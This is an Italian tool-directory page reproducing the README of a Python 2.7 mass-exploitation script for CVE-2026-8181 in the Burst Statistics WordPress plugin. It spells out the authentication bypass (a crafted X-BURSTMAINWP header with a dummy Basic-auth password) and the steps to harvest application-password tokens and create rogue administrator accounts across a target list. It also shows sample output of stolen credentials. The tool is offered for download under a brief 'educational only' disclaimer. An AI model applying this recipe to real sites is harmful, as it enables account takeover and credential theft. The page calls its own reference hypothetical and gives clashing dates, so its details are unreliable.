Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-8181 — CVE-2026-8181: Bypass dell'autenticazione di Burst Statistics → compromissione dell'API REST e creazione di un admin. Python 2.7. Solo per uso educativo. | Kitploit
Strumenti/GitHubGitHub/jenderal92/cve-2026-8181
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e Formazione
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181: Bypass dell'autenticazione di Burst Statistics → compromissione dell'API REST e creazione di un admin. Python 2.7. Solo per uso educativo.

Vedi Repository
74 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-8181 - Exploit per il Bypass dell'Autenticazione di Burst Statistics

Python 2.7 exploit per la vulnerabilità del plugin Burst Statistics (CVE-2026-8181) che consente ad attaccanti non autenticati di bypassare l'autenticazione REST API, recuperare le password delle applicazioni e creare nuovi utenti amministratori su siti WordPress vulnerabili.

⚠️ Disclaimer
Questo strumento è solo per scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Usalo solo su siti web di tua proprietà o per cui hai esplicito permesso di testare. Puoi vedere ulteriori disclaimer sulla copertina di Jenderal92. Puoi verificarlo QUI !!!

CVE-2026-8181 colpisce il plugin Burst Statistics per WordPress (versioni precedenti alla patch). Il difetto risiede nel meccanismo di autenticazione REST API e consente a un attaccante di:

  • Bypassare l'autenticazione inviando un header X-BURSTMAINWP appositamente costruito
  • Recuperare le password delle applicazioni tramite l'endpoint /burst/v1/mainwp-auth
  • Eseguire azioni privilegiate (elencare utenti, leggere impostazioni, creare nuovi account admin) attraverso la REST API di WordPress

Caratteristiche

  • Scansione multi-thread (10 thread predefiniti)
  • Rilevamento automatico dei percorsi base di WordPress (/, /wordpress, /wp)
  • Enumerazione degli username tramite /wp-json/wp/v2/users o redirect dell'ID autore
  • Sfruttamento del bypass di autenticazione per:
    • Ottenere le password delle applicazioni (token codificato Base64)
    • Verificare l'accesso a endpoint REST sensibili (impostazioni, plugin, utenti admin)
    • Creare un nuovo utente amministratore con credenziali casuali
  • Due file di output:
    • res_login.txt – Credenziali REST API concise, separate da pipe (facili da analizzare/importare)
    • full_res_login.txt – Report completo e leggibile che include verifica dell'accesso e password delle applicazioni

Requisiti

  • Python 2.7 (deprecato ma richiesto dallo script)
  • libreria requests
pip install requests

Utilizzo

  1. Preparare un file con l'elenco dei target (un dominio o IP per riga, con o senza http:///https://).

    Esempio targets.txt:

    example.com
    https://vulnerable-site.com
    127.0.0.1/wordpress
    
  2. Eseguire l'exploit:

python2 CVE-2026-8181.py targets.txt
  1. I risultati vengono salvati in due file nella directory corrente:
    • res_login.txt – Credenziali REST API (una riga per target vulnerabile)
    • full_res_login.txt – Report dettagliato

Opzioni della riga di comando

ArgomentoDescrizione
list.txtPercorso del file contenente gli URL dei target

Esempio di output (console)

============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']

[*] Scanning: example.com
    Trying path: /
    Detected username: admin
    [+] VULNERABLE! REST API bypass successful
    [+] Application Password obtained!
    [+]   Username: admin
    [+]   App Password: xxxx xxxx xxxx
    [+]   Base64 Token: YWRtaW46eHh4eA==
    [+] Access confirmed: WordPress settings
    [+] Access confirmed: Installed plugins
    [+] Access confirmed: Admin users
    [+] Admin user created via REST API: wp_abc123
    [+] Results saved to res_login.txt and full_res_login.txt

Formati dei file di output

1. res_login.txt – Credenziali REST API concise

Ogni riga segue questo formato separato da pipe:

target|username|password|email|user_id

Esempio:

http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42

Questo formato è ideale per:

  • Importare in password manager o database
  • Automatizzare azioni successive (ad es., script di login)
  • Ispezione rapida con cut, grep o Excel

2. full_res_login.txt – Report dettagliato completo

Per ogni target vulnerabile, lo script aggiunge un blocco leggibile:

============================================================
Target: http://example.com
============================================================

[+] Access Verification:
    [+] WordPress settings
    [+] Installed plugins
    [+] Admin users

[+] REST API Credentials:
    Username: wp_abc123
    Password: random12char
    Email: [email protected]
    User ID: 42
    URL: http://example.com/wp-admin/
    Note: Use with X-BURSTMAINWP header

[+] Application Password:
    Username: admin
    App Password: xxxx xxxx xxxx
    Base64 Token: YWRtaW46eHh4eA==

Nota: Se l'endpoint della password dell'applicazione non è disponibile o non restituisce alcun token, quella sezione mostrerà FAILED.

Come funziona

  1. Preparazione del target – Aggiunge il prefisso http:// se mancante, rimuove gli slash finali.
  2. Iterazione dei percorsi – Prova /, /wordpress e /wp come directory base di WordPress.
  3. Enumerazione degli username – Recupera /wp-json/wp/v2/users o utilizza i redirect ?author=N.
  4. Test di bypass – Invia X-BURSTMAINWP: 1 + Basic auth con username e password fittizia (CVE-2026-8181). Se l'endpoint /wp-json/wp/v2/users/me?context=edit restituisce 200, il sito è vulnerabile.
  5. Sfruttamento –
    • Richiede /wp-json/burst/v1/mainwp-auth per recuperare un token per la password dell'applicazione.
    • Verifica l'accesso a /settings, /plugins, /users.
    • Crea un nuovo account amministratore tramite POST /wp-json/wp/v2/users.
  6. Salvataggio dei risultati – Scrive le credenziali REST concise in res_login.txt e i dettagli completi in full_res_login.txt.

Personalizzazione

Puoi modificare queste variabili all'interno dello script:

  • THREADS – Numero di thread concorrenti (default 10)
  • BASE_PATHS – Ulteriori sottodirectory di WordPress da controllare
  • valori di timeout di requests

Licenza

Questo progetto è fornito solo a scopo educativo. Usalo a tuo rischio.

Riferimenti

  • Dettaglio CVE-2026-8181 (ipotetico)
  • Plugin Burst Statistics (versioni interessate)
Scarica lo strumento